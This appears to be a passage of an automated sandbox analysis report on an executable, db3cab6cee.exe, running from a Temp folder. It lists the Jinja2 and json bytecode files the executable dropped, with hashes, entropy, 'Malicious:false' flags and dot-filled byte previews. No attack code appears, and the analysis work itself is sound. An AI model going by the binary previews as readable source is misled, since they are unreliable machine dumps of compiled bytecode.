                                                                                                                                            Preview:........Wr.ed|.............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.........rFd.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.j.......................Z...G.d...d.e...............Z e.j!........e.e f...........Z"d.Z#e.j$........e%d.f...........e&d.<.....e.j'........d...............Z(..G.d...d...............Z)e.d.e.d.e.j*........d.e.j*........d.e.j!........e.j*........e.f...........f.d ................Z+d!e.j,........e%g.e%f...........d.e.j,........d.e%f...........f.d"..Z-d!e.j,........e%e%e.g.e%f...........d.e.j,........d.e%f...........f.d#..Z/d!e.j,........e%e%g.e%f...........d.e.j,........d.e%f...........f.d$..Z0d!e.j,........e%e%e%e.g.e%f...........d.e.j,........d.e%f...........f.d%..Z1..G.d&..d'e)..............Z2..G.d(..d)e)..............Z3..G.d*..d+e)..............Z4..G.d,..d-e)..............Z5e#d.f.d/e.j6........d0e.j7........e%......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\jinja2\filters.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):76233
                                                                                                                                            Entropy (8bit):5.582220054336696
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:CWjnum+s0T+19yZzxHmY5AjyIgbN4Y9fw+lXGA/ZYHt06BNx3kTYmN79cgVTJeHB:CMP8n4YxpBKYpUgb6N3HFh
                                                                                                                                            MD5:1628517957BBC237E5CC4846C9346D0E
                                                                                                                                            SHA1:8A8D4F5E63ECD6CD1AFC3EBF8316ED04F042FFF1
                                                                                                                                            SHA-256:9A9E2B678A62AA4DEC897F812A2BE5161B48F78CD20404CC3C4FDB2BFED21F51
                                                                                                                                            SHA-512:FE7D0FCA480ECACC71A6E143DA48D96E67CC23C92E90AF71372EA15F189569B15D391C9DF3A3911A5FBA9C0CF8DBDC0C8DADAC7236DC7F3D56B77BC9D31BD652
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Wr.ef.........................~.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j ........r/d.d.l!Z"d.d.l#m$Z$..d.d.l%m&Z&..d.d.l.m'Z'..d.d.l(m)Z)....G.d...d.e"j*......................Z+..e.j,........d.e.j-........d.e.j.........f...........................Z/..e.j,........d ..............Z0..e.j,........d!..............Z1d"e1d#e1f.d$..Z2....d.d%d&d'e.j3........e.j4........e5e6f.....................d(e.j3........e.j-........e.j.........g.e.j.........f.....................d)e.j3........e.j...................d#e.j-........e.j.........g.e.j.........f...........f.d*..Z7..d.d%d&d'e.j3........e.j4........e5e6f.....................d(e.j3........e.j-........e.j.........g.e.j.........f.....................d#e.j-........e.j.........g.e.j8........e.j...............

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\jinja2\idtracking.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19562
                                                                                                                                            Entropy (8bit):5.144879621538705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:sIXcmmdQG4UQai++iqRhff63yLOqZU+XJFP1xAOuXQ7T/:sKzjvaR+iqRhff63nqZ3JF0Q7T/
                                                                                                                                            MD5:23CDCEA195650D7F6E32EC666755ECCF
                                                                                                                                            SHA1:72F96BC9D92748271B4CC9B9F5B22DD543400F53
                                                                                                                                            SHA-256:E25A75DD3DA534FD2EA4F881120BBDC3DAE53461C843C7161EAB021B2D937025
                                                                                                                                            SHA-512:A99EAA59D72CC2EA537E8E3C3996F9C38BADF03C755F2472BBB6509A73B2C9DAA6766375BF7ADF00A935890772502413374B6ED7FD8BBED91593F0CAB770EFFA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Wr.e.)..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z...d.d.e.j.........e.j...................d.e.j.........d...........d.d.f.d...Z...d.d.e.j.........d.e.j.........d...........d.d.f.d...Z...G.d...d...............Z...G.d...d.e...............Z...G.d...d.e...............Z.d.S.)......N.....)...nodes)...NodeVisitor..param..resolve..alias..undefinedr......parent_symbols..Symbols..returnc.....................x.....t...........|.................}.t...........|...............}.|.D.].}.|.......................|...................|.S...N)...parent).r......FrameSymbolVisitor..visit).r....r......sym..visitor..nodes.... .eC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\jinja2\idtracking.py..find_symbolsr........sJ..............(..(..(.C.. ....%..%.G.......................d................J.....r....c.....................P.....t...........|.................}.|.......................|.................|.S.r....).r......analyze_n

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\jinja2\lexer.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):35637
                                                                                                                                            Entropy (8bit):5.498481281827327
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:ylDVLphc3NZuhXnmqKUNuQdxJ/8x+B8Y7ljmI:yBVLpWPiNV888c
                                                                                                                                            MD5:3C0504BB2D7B6482BFAC6AB45E8E61E6
                                                                                                                                            SHA1:7437CA8445E78314EF8E19269A14B45B9DCDDBEC
                                                                                                                                            SHA-256:6E14B0813F14593DA2668B76FD1A6068E74F0A3A1BC34DFE140CA4A7AC5BC8F0
                                                                                                                                            SHA-512:6EFF21FD96371C511EB773026277AF64F82C1363EC60D3E31609C77DDBE1F4715E3D099877306E253B6C1964FE26E14587C7B8F5C3F6CF41766BC34E7E893508
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Wr.e.t..............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.........r.d.d.l.Z.d.d.l.m.Z.....e.d...............Z.e.j.........e.j.........d.f...........e.d.<.....e.j.........d...............Z...e.j.........d...............Z...e.j.........d.e.j.......................Z...e.j.........d.e.j.........e.j ........z.................Z!..e.j.........d.e.j.........e.j ........z.................Z"..e.d...............Z#..e.d...............Z$..e.d...............Z%..e.d...............Z&..e.d...............Z'..e.d...............Z(..e.d...............Z)..e.d...............Z*..e.d...............Z+..e.d...............Z,..e.d...............Z-..e.d...............Z...e.d...............Z/..e.d ..............Z0..e.d!..............Z1..e.d"..............Z2..e.d#..............Z3..e.d$..............Z4..e.d%..............Z5..e.d&..............Z6..e.d'..............Z7..e.d(..............Z8..e.d)..............Z9..e.d*..............Z:..e.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\jinja2\loaders.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33084
                                                                                                                                            Entropy (8bit):5.347949126727967
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:Vj7f+F7CU7lQPUUBOPb91K98PRwuo0nDCfbARFrMIGuxoiNv9iVb:VffYLKup2YFrH681Y
                                                                                                                                            MD5:C5ACF79D90AD4545FA2DC1440A1A2A9C
                                                                                                                                            SHA1:429E4F0B9CD6C5CA86F6F6231CE1DD5C5CDCA8A3
                                                                                                                                            SHA-256:2948001C7C31B3DF136393DD524E7687C1DDE8409199565BD0964B69C7044339
                                                                                                                                            SHA-512:6CEED00D34D7B0733E68FF3CBE971768785C6E9D49B60B72B2D0F36F0A3FE59D9A512AC56890500F41DFA6C7519D3BE06A02F15B4CF677D1B5E6B152213D5383
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Wr.e-Z..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.........r.d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.j.........e...........f.d...Z...G.d...d...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z ..G.d...d.e...............Z!..G.d...d.e...............Z"..G.d...d.e...............Z#..G.d...d e...............Z$d.S.)!zKAPI and implementations for loading templates from different data.sources.......N)...abc)...sha1)...import_module)...ModuleType.....)...TemplateNotFound)...internalcode)...Environment)...Template..template..returnc.....................*.....g.}.|.......................d...............D.]z}.t...........j.........j.........|.v.s9t...........j.........j.........r.t...........j.........j.........|.v.s.|.t...........j.........j.........k.....r.t...........|.................|.r.|.d.k.....r.|

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\jinja2\nodes.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64502
                                                                                                                                            Entropy (8bit):5.270026247148557
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:aFkpYspR80zx6u3jUK48sQIWYHArL7Ge/GybY/PnHv1W5Te:aKR2u4WsVIn/jYv1WE
                                                                                                                                            MD5:6BF3026E5CEBDC5DD75CB441E1DB9717
                                                                                                                                            SHA1:CD7660C7866CC3695059294C07E7F768592D6376
                                                                                                                                            SHA-256:7A9D3A64824348439B13E3B2CFD8AE1F5B2E4B8FA91B2400C19D417EC371048C
                                                                                                                                            SHA-512:F315EE0F4E0A7CE5F4C972190A06C96237E8F8BE4CCB996AC5662CF018F0F8EA00BD0F13431EECE0EFB6A6B4CD5E85F0485473FE0E2E2BED63C697210F52C528
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Wr.e..........................x.....U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.........r.d.d.l.Z.d.d.l.m.Z.....e.j.........d.d.................Z.e.j.........e.j.........e.j.........e.j.........e.j.........e.j.........e.j.........d...Z.e.j.........e.e.j.........e.j.........e.j.........g.e.j.........f...........f...........e.d.<...e.j.........e.j ........e.j!........d...Z"e.j.........e.e.j.........e.j.........g.e.j.........f...........f...........e.d.<...e.j#........e.j$........e.j%........e.j&........e.j'........e.j(........d...d...d...Z)e.j.........e.e.j.........e.j.........e.j.........g.e.j.........f...........f...........e.d.<.....G.d...d.e*..............Z+..G.d...d.e,..............Z-..G.d...d...............Z.d.d.d.e.j/........e...........d.e.f.d...Z0..G.d...d.e-................Z1..G.d...d e1..............Z2..G.d!..d"e1..............Z3..G.d#..d$e1..............Z4..G.d%..d&e2..............Z5..G.d'..d(e2..............Z6..G.d)..d*e2..............Z7..G.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\jinja2\optimizer.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2872
                                                                                                                                            Entropy (8bit):5.358798985932195
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:zmnjYD6KqF7sG9IVjm2tG1sH7Ao3rntzyjlqnp/gNAIHI:CnwOAG2VXG1w7AStW5qp/g2Io
                                                                                                                                            MD5:915F9A040C4A67C6546600D8F90C4BEC
                                                                                                                                            SHA1:7D7E3DCFB9E96A7927F71772E72108C9BF1EC793
                                                                                                                                            SHA-256:A6852B9634C361E575CD3A1D1DAC627C70E272A3DEB542AD0C741B32FE7D63DD
                                                                                                                                            SHA-512:99EC26CC645881384551E7C0AF9417AE8A0B9A5500887F91EF26911184927DA5CC5B7824A7A3712A3EF25600449BCD500BF17D2C05C070110C941C917A8D4A2B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Wr.er..............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.........r.d.d.l.m.Z...d.e.j.........d.d.d.e.j.........f.d...Z...G.d...d.e...............Z.d.S.).a....The optimizer tries to constant fold expressions and modify the AST.in place so that it should be faster to evaluate...Because the AST does not contain all the scoping information and the.compiler has to find that out, we cannot do all the optimizations we.want. For example, loop unrolling doesn't work because unrolled loops.would have a different scope. The solution would be a second syntax tree.that stored the scoping rules.......N.....)...nodes)...NodeTransformer)...Environment..node..environmentr......returnc..........................t...........|...............}.t...........j.........t...........j.........|.......................|.............................S.).z^The context hint can be used to perform an static optimization. based on the context given.)...Optimizer..t..castr......Node..visit).

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\jinja2\parser.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):59445
                                                                                                                                            Entropy (8bit):4.970773274833189
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:YEjccr39K9izpvZIlsDfEgrzOXLD4S9EkDDaR:79K8toSRPS9fDDq
                                                                                                                                            MD5:E0C5685F14EFBE4BF1AF7E0282E5F803
                                                                                                                                            SHA1:11859E952215FE8352CF7F993490AA248B973D3B
                                                                                                                                            SHA-256:05A28E4D41BDAD6AB1B49101B335B256D2F21EE1DD050B6EF3AF753164CB78C8
                                                                                                                                            SHA-512:D323DA423E4641CA7926B23D39C8E79DC7D4EE119550A061917AF0EFF88C5A79572B1DCB6E30A5BB42BACAB9BD99ED39ADEE632FBDA44A31ACDF8FD62DF099A2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Wr.e8...............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.........r.d.d.l.Z.d.d.l.m.Z.....e.j.........d.e.j.........e.j.......................Z...e.j.........d.e.j.........e.j.......................Z...e.g.d.................Z...e.g.d.................Z.e.j.........e.j.........e.j.........e.j.........e.j.........e.j.........d...Z e.j!........e"e.j#........e.j$..................f...........e%d.<.....G.d...d...............Z&d.S.).z8Parse tokens from the lexer into nodes for the compiler......N.....)...nodes)...TemplateAssertionError)...TemplateSyntaxError)...describe_token)...describe_token_expr)...Environment.._ImportInclude.._MacroCall)...for..if..block..extends..print..macro..include..from..import..set..with..autoescape)...eq..ne..lt..lteq..gt..gteq)...add..sub..mul..div..floordiv..mod.._math_nodesc.....................l.....e.Z.d.Z.d.Z.......dUd.d.d.e.d.e.j.........e...........d.e.j.........e...........d.e.j.......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\jinja2\runtime.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):50666
                                                                                                                                            Entropy (8bit):5.358318051858546
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:nn4SvxhaXTfX1T11C2JQcCbQRI+BApCgO0muJh7sLpEzw8G9GIYhVFKPgde:4Sq7lT11XQxbQRI+spOvuJh7stEzw8GT
                                                                                                                                            MD5:EE9F23B0B7DB31936B604AA90E6D58F8
                                                                                                                                            SHA1:78C325CA8C7A1B36A6D4772619764D0553389F14
                                                                                                                                            SHA-256:F9142A9039591DF42D209EFF11B22713D5F67A3CB5A80F4334D63FE5A1BBB78E
                                                                                                                                            SHA-512:C01F3E5A07C45EF0865E9C3D410666D2FA740C1B72BF42764672AD48184762CF5E1A8CD8BDCDF1FFF124CF12AA0B017C8E8C254BFA9EF891985E3B34CEEA4861
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Wr.e~......................... .....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j.........d...............Z...e.j.........d.e.j ........d.e.j!........f...........................Z"e.j#........r!d.d.l$Z$d.d.l%Z&d.d.l'm(Z(....G.d...d.e&j)......................Z*g.d...Z+g.d...Z,d.e.d e.f.d!..Z-d"e.j.........e.j!..................d e/f.d#..Z0d"e.j.........e.j!..................d e/f.d$..Z1........dId&d'd(e.j2........e/..........d)e.j3........e/e.j ........d*g.e.j4........e/..........f...........f...........d+e.j2........e.j3........e/e.j!........f.....................d,e5d-e.j2........e.j6........e/e.j!........f.....................d.e.j2........e.j7........e/e.j!........f.....................d d*f.d/..Z8..G.d0..d1..............Z9d2e"d e"f.d3..Z:e.j7........j;..........G.d4..d*....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\jinja2\sandbox.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18840
                                                                                                                                            Entropy (8bit):5.545089740948553
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:fsMwEmzaL/Bho+y9aZAgu4TuHghkZ2cV5r10FPppo:UMwEmz8o+y9fguIuGe5RSPppo
                                                                                                                                            MD5:F98C85D658450795801F1BE2E6412627
                                                                                                                                            SHA1:27A808A433010D6832D3681452D67F3D30B0B433
                                                                                                                                            SHA-256:83AE394658105B5E61AE426891D8271CD6A0BA83EF3BD8CE99059E08DCCE6686
                                                                                                                                            SHA-512:EE035C3E77737FAFDA472F426F1C49080BA4B48653095708BEAE6A091C437B01117AF44999AC077A41001EE40697244252F39464D41DEDCA4C0BA4F8D7D98989
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Wr.e.8........................V.....U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j.........d.e.j.........d.e.j.........f...........................Z.d.Z...e...............Z.e.j.........e...........e.d.<.....e...............Z e.j.........e...........e.d.<...d.d.h.Z!d.d.h.Z"d.d.h.Z#e.j$..........e%g.d.................f.e.j&..........e%g.d.................f.e.j'..........e%g.d.................f.e...e%g.d.................f.f.Z(e.j)........e.j)........e.j*........e.j+........e...........f...........d.f...........e.d.<...d.e.j.........d e.j,........e...........f.d!..Z-d"e.d e/f.d#..Z0d$e.d e.f.d%..Z1d&e.j.........d'e.d e2f.d(..Z3d&e.j.........d'e.d e2f.d)..Z4..G.d*..d+e...............Z5..G.d,..d-e5..............Z6..G.d...d/e...............Z7..G.d0..d1e7e...............Z8d.S.)2z.A sandbox layer that ensures unsafe operations cannot be performed..Useful when the template itself

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\jinja2\tests.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9263
                                                                                                                                            Entropy (8bit):5.3631215096939995
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:9JGr/dp1y1BPyrTTRGWqK7n6JqyC88ut0U7:9JsdmajqK6qyaE
                                                                                                                                            MD5:0FB1F3DF527B5B3DF5AD7153C1CA955F
                                                                                                                                            SHA1:A5BC8CD0AD1048AE05137DDA4106A6AB2A38074B
                                                                                                                                            SHA-256:631123C1FA82915F2FC472EE0C38C773BD64CC9C357E04F3FD10F8DB7DD37C3D
                                                                                                                                            SHA-512:7AD98702EEB0652D587988688719E5BAFBAB0382A51CA5B2ED18EA02EA3293EE4F3DEBBCF3231EE53ED87A8F685711F1CC202D9F5C8CCD07B016887E33F27D7A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Wr.e..........................6.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.........r.d.d.l.m.Z...d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.j.........d.e.f.d...Z.d.e.j.........d.e.f.d...Z.e.d.d.d.e.d.e.f.d.................Z.e.d.d.d.e.d.e.f.d.................Z.d.e.j.........d.e.f.d...Z.d.e.j.........d.e.f.d...Z.d.e.j.........d.e.f.d...Z.d.e.j.........d.e.f.d...Z.d.e.j.........d.e.f.d...Z.d.e.j.........d.e.f.d...Z.d.e.d.e.f.d...Z d.e.d.e.f.d...Z!d.e.j.........d.e.f.d...Z"d.e.j.........d.e.f.d...Z#d.e.j.........d.e.f.d...Z$d.e.j.........d.e.f.d ..Z%d.e.j.........d!e.j.........d.e.f.d"..Z&d.e.j.........d.e.f.d#..Z'd.e.j.........d.e.f.d$..Z(d.e.j.........d%e.j)........d.e.f.d&..Z*i.d'e...d(e...d)e...d*e...d+e...d,e...d-e...d.e...d/e...d0e...d1e...d2e...d3e...d4e ..d5e!..d6e"..d7e#..i.d8e$..d9e%..d:e'..d;e+..d<e&..d=e(..d>e*..d?e.j,..........d@e.j,..........dAe.j,..........dBe.j-..........dCe.j-..........dDe.j...........dEe.j...........dF

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\jinja2\utils.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):37078
                                                                                                                                            Entropy (8bit):5.516174363737232
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:wJcOzQyYpgo3xnJ1WdhGYxET7TTFQoppE3NPvXd:8ceQDpRBTWdsDTTfpE3JXd
                                                                                                                                            MD5:2272A2A1FDA47AD2D7004D2723B0F139
                                                                                                                                            SHA1:913DCB4FFB3A6D4D6D24CF68092CAE0FC6656066
                                                                                                                                            SHA-256:4F02FA4F49EE97F0112B7BE1ECB153585740B275E8561092F08F3DAA98FD3094
                                                                                                                                            SHA-512:2EFE7C3AB295251428C1C7FA4FE7E0183A6E6920980E9D7329C21A491D8B5CEEA709AFDB244CDF1C5A8A45CD6E83D87BF4C413CBBBFA0849022E0D8F3540CDDA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Wr.e}]........................d.....U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.e.j.........r.d.d.l.Z...e.j.........d.e.j.........d.e.j.........f...........................Z.....e.d.d.d.d...i.............................Z.e.j.........e.d.<.....e...............Z.e.j.........e...........e.d.<...d.j ........Z!d.e.d.e.f.d...Z"d.e.d.e.f.d...Z#d.e.d.e.f.d...Z$..G.d...d.e.j%......................Z&d.e.d.e.f.d...Z'd.e.j.........d.e(f.d...Z)d.e.j*........e.j...................d.d.f.d...Z+dPd...Z,dQd!e-d"e(d.e.j.........f.d#..Z.dRd%e-d&e-d.e.j/........e.j0..................f.d'..Z1d.e.j.........d.e-f.d(..Z2d.e.j.........d.e-f.d)..Z3..e.j4........d*e.j5........e.j6........z.................Z7..e.j4........d+..............Z8........dSd,e-d-e.j/........e9..........d.e.j/........e-..........d/e.j/........e-..........d0e.j/........e.j*........e-....................d.e-f.d1..Z:..dTd6e9d7e(d8e9d9e9d.e-f.d:

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\jinja2\visitor.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5732
                                                                                                                                            Entropy (8bit):5.46205219828817
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:hGuO3X0I5gKr3lkcaL6+Hc07cUSBvavrhLDzaoSSSJl:HKVlgd7cUIqrYoSSSJl
                                                                                                                                            MD5:84759E1325A65D492C3C8743BB660931
                                                                                                                                            SHA1:E93BF79923E15F86ECF2F5E25DC720344E0E3CB9
                                                                                                                                            SHA-256:AD241FC24841F0959DF568084DE8347DCBAED2B95ED28C17526B454CFB423AFB
                                                                                                                                            SHA-512:C3594A40910FBE718FA6DEB092154CC4E09A93FFD79B9AA0573754D26F73035E3F4B19441C8D5EC201B3F7F6904A828A5FC20F40C0949AF2D4CD1FD017C9234A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........Wr.e...............................d.Z.d.d.l.Z.d.d.l.m.Z...e.j.........r.d.d.l.Z...G.d...d.e.j.......................Z...G.d...d...............Z...G.d...d.e...............Z.d.S.).zVAPI for traversing the AST nodes. Implemented by the compiler and.meta introspection.......N.....)...Nodec.....................D.....e.Z.d.Z.d.e.d.e.j.........d.e.j.........d.e.j.........f.d...Z.d.S.)...VisitCallable..node..args..kwargs..returnc...........................d.S...N..)...selfr....r....r....s.... .bC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\jinja2\visitor.py..__call__z.VisitCallable.__call__....s..........C.....N)...__name__..__module__..__qualname__r......t..Anyr....r....r....r....r....r........sJ..........................a.e......q.u.......................................r....r....c..........................e.Z.d.Z.d.Z.d.e.d.d.f.d...Z.d.e.d.e.j.........d.e.j.........d.e.j.........f.d...Z.d.e.d.e.j.........d.e.j.........d.e.j.........f.d...Z.d.S

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\json\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14267
                                                                                                                                            Entropy (8bit):5.628872749049515
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:1M0k25NAbr56B7+vx1GkRGqFYvQxtKv72vx1GkRGqCZv9U6QRQkQsx1LfWQkQsxS:1M0TNAb3vx/YvE3vxgZvwZrpWZryh
                                                                                                                                            MD5:D0DC66FC10AB1734B057EC69382488D6
                                                                                                                                            SHA1:12FE3BF7D83B96FBB050C2B1D3553006B94416B4
                                                                                                                                            SHA-256:267C2FCF88996EF3D557745698C98542401DB61C21BAB76E377F2451D9B10DBE
                                                                                                                                            SHA-512:8BD49A7B06BDEE956A5CC42AEBAF6DB6D0132E94AAE47C03C59C1145D913AC31E141273690EDDE5DC70DAA8CB46AA36168A7CCB54ACFEBB07C73FACCCDF8C671
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d+8..............................d.Z.d.Z.g.d...Z.d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z...e.d.d.d.d.d.d.d.................Z.d.d.d.d.d.d.d.d.d.d...d...Z.d.d.d.d.d.d.d.d.d.d...d...Z...e.d.d.................Z.d...Z.d.d.d.d.d.d.d...d...Z.d.d.d.d.d.d.d...d...Z.d.S.).a....JSON (JavaScript Object Notation) <https://json.org> is a subset of.JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data.interchange format...:mod:`json` exposes an API familiar to users of the standard library.:mod:`marshal` and :mod:`pickle` modules. It is derived from a.version of the externally maintained simplejson library...Encoding basic Python object hierarchies::.. >>> import json. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]). '["foo", {"bar": ["baz", null, 1.0, 2]}]'. >>> print(json.dumps("\"foo\bar")). "\"foo\bar". >>> print(json.dumps('\u1234')). "\u1234". >>> print(json.dumps('\\')). "\\". >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_ke

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\json\decoder.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15234
                                                                                                                                            Entropy (8bit):5.7337562679281335
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:twaA6j8n/GjRqRXif48muIPS2uhooxtleef:BjUSw8muPtlTf
                                                                                                                                            MD5:FE5273BA6D1B19B88ADEF5A6ED2749C2
